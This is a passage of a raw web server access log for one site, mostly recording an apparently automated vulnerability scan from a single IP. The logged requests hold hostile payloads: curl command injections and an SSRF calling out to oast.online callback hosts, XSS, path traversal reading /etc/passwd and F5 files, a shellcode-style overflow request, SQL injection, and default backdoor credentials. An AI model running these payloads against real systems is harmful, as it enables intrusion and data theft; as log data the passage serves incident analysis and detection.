/about.php?ac=change_about_path&api=&path=&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 162.248.72.168 - - [24/Apr/2025:05:53:42 -0400] "GET /640275/about.php?ac=change_about_path&api=&path=&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:53:50 -0400] "PUT /v1/kv/2w9rfWobH6bR7nYIzBCOsSF13xD HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:54:01 -0400] "GET /v1/kv/2w9rfWobH6bR7nYIzBCOsSF13xD?raw HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0" 154.84.62.234 - - [24/Apr/2025:05:54:36 -0400] "POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:56:06 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 
Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:56:12 -0400] "POST /checkValid HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:05:56:20 -0400] "GET /public/css/2w9rfa6tr3kLpp8Z1C1okYMiqfJ.css HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0" 203.177.19.234 - - [24/Apr/2025:05:56:47 -0400] "GET /640275/about.php?ac=change_about_path&api=&path=&t=650adf113939f450c764fa0c091b7f06&s=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:56:58 -0400] "GET /tos/index.php?user/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:57:09 -0400] "POST /wizard/initialise.php HTTP/1.1" 200 0 "https://mgrokokbet.id/tos/index.php?user/login" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:57:10 -0400] "GET /include/makecvs.php?Event=%60curl+http%3a//d04qr7ij4pq19d75k490eaosprch1ihjk.oast.online+-H+'User-Agent%3a+nLBnOT'%60 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:05:57:13 -0400] "GET /wp-content/plugins/canto/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:57:17 -0400] "GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//d04qr7ij4pq19d75k490zc4hc7y9kzukq.oast.online+-H+'User-Agent%3a+nLBnOT'%60 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:05:57:30 -0400] "GET / 
HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:05:58:06 -0400] "POST /assets/_core/php/profile.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:58:13 -0400] "POST /assets/php/profile.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:05:58:21 -0400] "POST /vendor/qcubed/qcubed/assets/php/profile.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:58:48 -0400] "POST /goform/setSysAdm HTTP/1.1" 200 0 "https://mgrokokbet.id/login.shtml" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:05:58:53 -0400] "POST /convert HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:05:58:54 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:59:01 -0400] "GET /file/VihWan.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 154.84.62.234 - - [24/Apr/2025:05:59:02 -0400] "GET /server-common/cgi-bin/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:59:15 -0400] "POST /assets/php/upload.php HTTP/1.1" 403 1242 "http://mgrokokbet.id" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:05:59:22 -0400] "GET /assets/data/usrimg/2w9rfwaft59eybyulxoxfpqrsay.php 
HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/616.19 (KHTML, like Gecko) Version/17.7.17 Safari/616.19" 154.84.62.234 - - [24/Apr/2025:05:59:44 -0400] "POST /actions/authenticate.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:05:59:58 -0400] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:06:00:09 -0400] "GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:00:12 -0400] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:06:00:14 -0400] "GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:00:26 -0400] "POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_5_3; en-US) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:00:27 -0400] "POST /auth/check HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:00:27 -0400] "GET /upload/userfiles/image/2w9rfWIyiiA6PyPrty9ZYo7CpKF.png HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_6; de) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:00:28 -0400] "GET /ext-js/index.html HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 
154.84.62.234 - - [24/Apr/2025:06:00:57 -0400] "POST /auth/newpassword HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.9.25" 154.84.62.234 - - [24/Apr/2025:06:02:01 -0400] "POST /auth/requestreset HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:02:12 -0400] "POST /auth/requestreset HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/127.0.2 (x64 de)" 154.84.62.234 - - [24/Apr/2025:06:04:18 -0400] "GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:04:26 -0400] "GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:06:21 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0" 154.84.62.234 - - [24/Apr/2025:06:06:25 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:08:28 -0400] "GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)" 154.84.62.234 - - [24/Apr/2025:06:09:04 -0400] "GET /index.php?module=users/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0" 154.84.62.234 - - [24/Apr/2025:06:09:28 -0400] "GET /index.php?module=users/login HTTP/1.1" 
200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:06:09:44 -0400] "GET /wp-content/themes/15zine/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:06:10:47 -0400] "POST /dfsms/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 51.222.253.1 - - [24/Apr/2025:06:11:12 -0400] "GET /about.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" 154.84.62.234 - - [24/Apr/2025:06:11:20 -0400] "POST /os/mxperson HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:11:26 -0400] "POST /meaweb/os/mxperson HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.6.18" 154.84.62.234 - - [24/Apr/2025:06:13:24 -0400] "GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.5.27" 154.84.62.234 - - [24/Apr/2025:06:14:04 -0400] "POST /magmi/web/magmi_saveprofile.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:14:18 -0400] "POST /magmi/web/magmi_run.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:06:14:26 -0400] "GET /magmi/web/info.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:16:26 -0400] "POST /EemAdminService/EemAdmin HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) 
Version/16.6 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:16:48 -0400] "POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux aarch64; rv:90.0) Gecko/20100101 Firefox/90.0" 154.84.62.234 - - [24/Apr/2025:06:16:57 -0400] "POST /AdminTools/querybuilder/logon?framework HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.24" 154.84.62.234 - - [24/Apr/2025:06:18:01 -0400] "GET /wp-content/plugins/ultimate-faqs/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:06:18:35 -0400] "GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.2.22" 154.84.62.234 - - [24/Apr/2025:06:19:03 -0400] "GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://d04qr7ij4pq19d75k490xszcn5baa3isg.oast.online%23 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:06:19:22 -0400] "POST /cgi-bin/libagent.cgi?type=J HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:19:23 -0400] "POST /menu/stapp HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.26" 154.84.62.234 - - [24/Apr/2025:06:19:23 -0400] "POST /api/jsonws/invoke HTTP/1.1" 200 0 "https://mgrokokbet.id/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:06:19:23 -0400] "POST /api/jsonws/invoke HTTP/1.1" 
200 0 "https://mgrokokbet.id/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 154.84.62.234 - - [24/Apr/2025:06:19:41 -0400] "POST /session/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:06:20:08 -0400] "POST /account/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.5.23" 154.84.62.234 - - [24/Apr/2025:06:20:19 -0400] "POST /opensis/index.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:20:28 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4) AppleWebKit/616.33 (KHTML, like Gecko) Version/17.6 Safari/616.33" 154.84.62.234 - - [24/Apr/2025:06:20:55 -0400] "GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337\">&id=3&nsvpx=phpinfo HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1" 154.84.62.234 - - [24/Apr/2025:06:21:04 -0400] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/128.0 (x64 de)" 154.84.62.234 - - [24/Apr/2025:06:24:10 -0400] "GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:24:29 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:06:24:40 -0400] "GET /wp-admin/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 
(KHTML, like Gecko) Version/15.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:24:53 -0400] "GET /graph_realtime.php?action=init HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:06:24:57 -0400] "POST /getcfg.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:25:04 -0400] "POST /graphql HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.2.19" 154.84.62.234 - - [24/Apr/2025:06:25:04 -0400] "POST /webtools/control/xmlrpc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:06:25:13 -0400] "POST /webtools/control/xmlrpc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:06:25:34 -0400] "POST /upload HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:26:06 -0400] "POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0" 154.84.62.234 - - [24/Apr/2025:06:26:06 -0400] "GET /?author=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:26:13 -0400] "GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:06:26:13 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) 
Gecko/20100101 Firefox/128.0 (x64 de)" 154.84.62.234 - - [24/Apr/2025:06:26:20 -0400] "POST /storfs-asup HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:06:26:21 -0400] "GET /menu/neo HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:06:26:26 -0400] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:06:26:29 -0400] "GET /menu/stc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:26:34 -0400] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:26:39 -0400] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:06:26:48 -0400] "GET /hsqldb%0a HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:26:52 -0400] "POST /upload HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:26:57 -0400] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:27:10 -0400] 
"POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:27:19 -0400] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:06:27:27 -0400] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:06:27:44 -0400] "GET /images/..%2finfo.html HTTP/1.1" 200 0 "https://mgrokokbet.id/info.html" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:06:27:44 -0400] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://d04qr7ij4pq19d75k4904qmjqob8gumaw.oast.online+-H+%27User-Agent:+Ro65vE%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://d04qr7ij4pq19d75k490a1m3ng1sroroe.oast.online+-H+%27User-Agent:+Ro65vE%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:06:27:44 -0400] "GET 
/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d04qr7ij4pq19d75k490q7iwcz8i4z8ko.oast.online+-H+%27User-Agent:+Ro65vE%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://d04qr7ij4pq19d75k490pykhp5hmgwpfo.oast.online+-H+%27User-Agent:+Ro65vE%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15" 156.146.62.37 - - [24/Apr/2025:06:28:20 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:06:28:47 -0400] "POST /apply_sec.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:06:28:51 